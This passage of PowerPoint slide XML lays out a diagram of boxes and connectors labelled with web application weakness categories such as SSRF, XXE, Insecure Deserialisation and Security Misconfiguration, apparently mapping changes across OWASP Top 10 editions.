          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFD8CE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Insecure Storage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9" name="CustomShape 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6827872-E0CD-72AC-0C03-EFE86379C3A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="4693320"/>
            <a:ext cx="931320" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFD8CE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Insecure Cryptographic Storage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0" name="CustomShape 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5E4C846-D9E6-DC6D-5104-B5D0CBAEE89B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="4682520"/>
            <a:ext cx="9295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Failure to restrict URL access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1" name="CustomShape 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69BA8C3E-929E-FE1E-FCCA-B095D21E783E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="4693320"/>
            <a:ext cx="9259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Insecure Deserialisation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2" name="CustomShape 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68A11815-56FE-D2D3-BFB4-4ED6FEBC1FE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21567600">
            <a:off x="238320" y="5189400"/>
            <a:ext cx="91296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Denial of Service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3" name="CustomShape 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A728263E-691C-5FA5-7645-18771567C1FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="5189400"/>
            <a:ext cx="931320" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFD8CE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Insecure Communication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4" name="CustomShape 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3744155-538F-A3A8-690F-08A6C6DE774B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="5177160"/>
            <a:ext cx="929520" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFD8CE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Insecure Transport Layer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5" name="CustomShape 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{637B7A6B-5723-9AED-98DE-8E363D611522}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="5189400"/>
            <a:ext cx="925920" cy="4186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Components with known vulnerabilities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6" name="CustomShape 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B91F9C6-E3AA-51C5-6052-45FCE159E365}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="5189400"/>
            <a:ext cx="927720" cy="4186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Components with known vulnerabilities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7" name="CustomShape 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BF6D074-C001-6CE0-BE44-004E86F371F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="5189400"/>
            <a:ext cx="92448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Yu Mincho Demibold"/>
              </a:rPr>
              <a:t>Insufficient Logging &amp; Monitoring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8" name="CustomShape 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0F94C6A-6185-F459-A834-0C5B20A93DB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="5685480"/>
            <a:ext cx="912960" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFD8CE"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="FFD8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Insecure Config.  Management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9" name="CustomShape 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4D9925-9F9F-4DB9-B6A4-5CA3A36CE2B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="5685480"/>
            <a:ext cx="9313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Failure to restrict URL access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0" name="CustomShape 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAD61CCE-849F-26B4-43B5-08D17BBC9880}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="5671800"/>
            <a:ext cx="9295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Unvalidated Redirects and Forwards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1" name="CustomShape 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4D18C8E-1B2A-D7FD-0686-50FC052E99BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="5685480"/>
            <a:ext cx="9259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Insufficient Logging &amp; Monitoring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2" name="CustomShape 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B116A857-EDC4-8F56-7433-CDC665627E90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="5685480"/>
            <a:ext cx="9277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dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Unvalidated Redirects and Forwards</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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3" name="CustomShape 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A18F123-BE18-46A7-36D8-5CFE38C15C6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="5685480"/>
            <a:ext cx="924480" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="dkUpDiag">
            <a:fgClr>
              <a:srgbClr val="92D050"/>
            </a:fgClr>
            <a:bgClr>
              <a:srgbClr val="FFE575"/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SSRF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4" name="CustomShape 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4E9C7DE-3656-C00B-2968-44989E6DC7FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5339520" y="2711520"/>
            <a:ext cx="9259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XXE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5" name="CustomShape 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30419EF2-69BC-D78F-22C5-691EF99282D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038120" y="320472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Security Misconfig.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6" name="CustomShape 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{936E3F6A-7CF8-3AEF-999C-A312838D13BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5324040" y="370080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Security Misconfig.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7" name="CustomShape 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82A78ECD-04E9-218C-2DD0-2B284A6CD453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6590880" y="320472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Security Misconfig.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249" name="Connector: Curved 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D987AE4-C1C6-EF73-A9C6-35222D8B7820}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1193" idx="3"/>
            <a:endCxn id="1207" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251760" y="1429380"/>
            <a:ext cx="341640" cy="992160"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000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50" name="Connector: Curved 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54C7EF29-2B75-97BD-C7AB-2DC552F4778B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1206" idx="3"/>
            <a:endCxn id="1225" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4966560" y="2421360"/>
            <a:ext cx="359640" cy="1985040"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50100"/>
              <a:gd name="adj2" fmla="val 50009"/>
              <a:gd name="adj3" fmla="val 49899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51" name="Connector: Curved 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26F6460E-A10C-8CE3-100B-5098E9A81833}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1225" idx="3"/>
            <a:endCxn id="1207" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6251760" y="2421540"/>
            <a:ext cx="341640" cy="1984680"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="FFE575"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1252" name="Connector: Curved 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0C4BB8D-5244-5052-BEEA-52F90A9881C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1198" idx="3"/>
            <a:endCxn id="1206" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3695400" y="1924020"/>
            <a:ext cx="343440" cy="497520"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000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53" name="Connector: Curved 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A69E2FB0-0488-A4EB-14FF-7F13E641A50B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1191" idx="3"/>
            <a:endCxn id="1198" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2416680" y="1429380"/>
            <a:ext cx="349200" cy="494640"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000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54" name="Connector: Curved 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93F38451-1A46-5B19-DF87-9FC83028623F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1229" idx="3"/>
            <a:endCxn id="1224" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2416680" y="4397220"/>
            <a:ext cx="349560" cy="505440"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="FFD8CE"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1255" name="Connector: Curved 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28C113F6-F976-6BF9-3855-531DE8C78A95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1239" idx="3"/>
            <a:endCxn id="1230" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2416680" y="4891860"/>
            <a:ext cx="349200" cy="100296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stealth" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1257" name="Connector: Curved 80">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{383DCAF3-5978-4CFA-E1F9-7044D5B92395}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1202" idx="3"/>
            <a:endCxn id="1223" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1151640" y="2421540"/>
            <a:ext cx="333720" cy="1984680"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 30113"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="92D050"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1258" name="Connector: Curved 81">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{427AA5EF-FC13-595C-0A2B-5FFEF73BDC46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1196" idx="3"/>
            <a:endCxn id="1239" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163880" y="1925460"/>
            <a:ext cx="321480" cy="3969360"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 32223"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="92D050"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1259" name="Connector: Curved 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71FA4940-2DA2-A913-F265-A806B50C80FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1196" idx="3"/>
            <a:endCxn id="1209" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163880" y="1925460"/>
            <a:ext cx="321120" cy="98784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60" name="Connector: Curved 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E82CCD34-F06C-5E5D-DC91-AAF70E88D797}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1208" idx="3"/>
            <a:endCxn id="1191" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1151640" y="1429200"/>
            <a:ext cx="334080" cy="1488960"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 54045"/>
              <a:gd name="adj2" fmla="val 49987"/>
              <a:gd name="adj3" fmla="val 46170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61" name="Connector: Curved 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{143FA8F4-F412-F321-CCAD-167D7E444424}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1217" idx="3"/>
            <a:endCxn id="1197" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1151640" y="1925280"/>
            <a:ext cx="334080" cy="1985040"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 56252"/>
              <a:gd name="adj2" fmla="val 49990"/>
              <a:gd name="adj3" fmla="val 54999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62" name="Connector: Curved 86">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4342AB20-166C-579E-E2F0-4425C0D1FEB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1238" idx="3"/>
            <a:endCxn id="1233" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1151640" y="5398740"/>
            <a:ext cx="33372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FFD8CE"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1263" name="Connector: Curved 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF1E3CC5-ACAA-E7B7-C186-87D278A2305A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1223" idx="3"/>
            <a:endCxn id="1204" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2416680" y="2418660"/>
            <a:ext cx="349200" cy="1987560"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33106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64" name="Connector: Curved 88">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2215077-E46E-1A1F-55A7-BA7675EFCBBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1226" idx="3"/>
            <a:endCxn id="1216" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4966560" y="3414060"/>
            <a:ext cx="359280" cy="99216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65" name="Connector: Curved 89">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{141DDAB3-FBD4-BAD9-DA0A-FD70B97028CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1220" idx="3"/>
            <a:endCxn id="1205" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4966560" y="2421360"/>
            <a:ext cx="359640" cy="1488960"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50100"/>
              <a:gd name="adj2" fmla="val 49987"/>
              <a:gd name="adj3" fmla="val 49899"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="FFD8CE"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1266" name="Connector: Curved 90">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0D990D0-0C56-15B2-F10E-76CEB10740EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1241" idx="3"/>
            <a:endCxn id="1237" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6251760" y="5398740"/>
            <a:ext cx="34164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67" name="Straight Arrow Connector 91">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA6B4D8C-85AF-5D54-D8C5-9C4CF7C9CF3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3647160" y="1433700"/>
            <a:ext cx="407520" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975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68" name="Straight Arrow Connector 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5143BAA7-BAB9-9405-49F9-2859817FC220}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4914000" y="1934640"/>
            <a:ext cx="40752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69" name="Straight Arrow Connector 93">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6138931-AACC-AD74-55F8-896523AD9931}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3652200" y="5895000"/>
            <a:ext cx="40752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70" name="Straight Arrow Connector 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F85167F1-47B1-5877-2D86-AA7AF5412B9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074960" y="4901760"/>
            <a:ext cx="407160" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975">
            <a:solidFill>
              <a:srgbClr val="FFD8CE"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1271" name="Straight Arrow Connector 96">
            <a:extLst>
